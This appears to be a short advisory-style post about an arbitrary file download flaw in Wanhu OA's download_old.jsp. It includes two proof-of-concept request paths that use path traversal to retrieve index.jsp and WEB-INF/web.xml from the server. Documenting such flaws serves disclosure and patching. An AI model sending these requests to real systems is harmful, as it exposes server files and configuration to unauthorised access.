Wanhu Oa Download_old Jsp Any File Download Vulnerability
Wanhu Oa Download_old Jsp Any File Download Vulnerability
Wanhu OA download_old.jsp any file download vulnerability
Vulnerability Description
There is a vulnerability to download any file on Wanhu OA download_old.jsp file. The attacker can download any file on the server through the vulnerability.
Vulnerability Impact
Ten thousand households OA
Network surveying and mapping
Vulnerability reappears
Product Page
Verify POC
1
2
/defaultroot/download_old.jsp?path=..&name=x&FileName=index.jsp
/defaultroot/download_old.jsp?path=..&name=x&FileName=WEB-INF/web.xml
This post is licensed under CC BY 4.0 by the author.